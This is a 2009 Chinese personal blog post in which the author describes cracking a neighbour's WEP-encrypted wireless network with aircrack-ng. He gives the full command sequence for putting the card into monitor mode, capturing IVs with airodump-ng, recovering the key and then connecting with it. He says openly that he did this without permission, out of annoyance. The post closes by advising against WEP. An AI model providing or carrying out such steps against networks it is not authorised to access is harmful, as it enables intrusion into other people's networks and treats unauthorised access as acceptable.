注册 登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

zevan的博客

悟以往之不谏,知来者之可追

 
 
 

日志

 
 
关于我

Debian GNU/Linux user Vegetarian Seventh-Day Adventist

用aircrack破解wep加密的无线网络  

2009-07-01 15:46:05|  分类: Linux |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
    身边有一个WEP加密的无线网络,心中不爽,遂破解之。

硬件环境:Macbook 061, AR5008 Wireless Network Adapter.无线网卡驱动为ath9k.驱动完善.
软件环境:Debian/Gnu Linux sid.kernel 2.6.30-1-686

准备工作:
1. 安装如下的软件包:aircrack-ng。这就够了。其他的都是锦上添花的软件.
2. 扫描周围的无线网络:
iwlist scanning
可以看到一堆的无线路由.其中有一个就是WEP加密的,channel 6.记住它的ESSID,不妨假设它是"123" 吧!
3. 更改网卡的模式:
ifconfig wlan0 down 
iwconfig wlan0 mode monitor channel 6
ifconfig wlan0 up
不知道这个是不是必须的.
4.开始监听:
cd /tmp
airodump-ng --ivs --channel 6 -w crack_data wlan0
--ivs意味着只收集破解需要的数据, crack_data是数据文件的前缀.
比较幸运的是正好有很多数据在流通,不需要去主动"挑逗"无线路由.可以看到ESSID 为123的无线路由发出的数据包正在不断的积累.半个小时左右,数据包的数量的数量就达到了25000,现在就可以尝试破解了.
5.破解:
aircrack-ng -e 123 crack_data-01.ivs
开始破解ESSID为123的无线路由的密码.看到如下的字样,就破解成功了.运气不错,加密的密码很简单,只有5位数字.
KEY FOUND! *********
Decrypted correctly: 100%
后来我想了想,这5位数字正好是他们的电话号码的后5位.
6.使用:
重新设定网卡的属性
ifconfig wlan0 down
iwconfig wlan0 mode managed channel Auto
ifconfig wlan0 up
然后用wicd重新设置一下网络,用破解出来的密码去连接123的无线路由就可以了.看起来还不错.

总结:
1.破解WEP无线网络很简单.
2.WEP加密不可靠,别用了.好歹用个WPA吧!

  评论这张
 
阅读(104)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018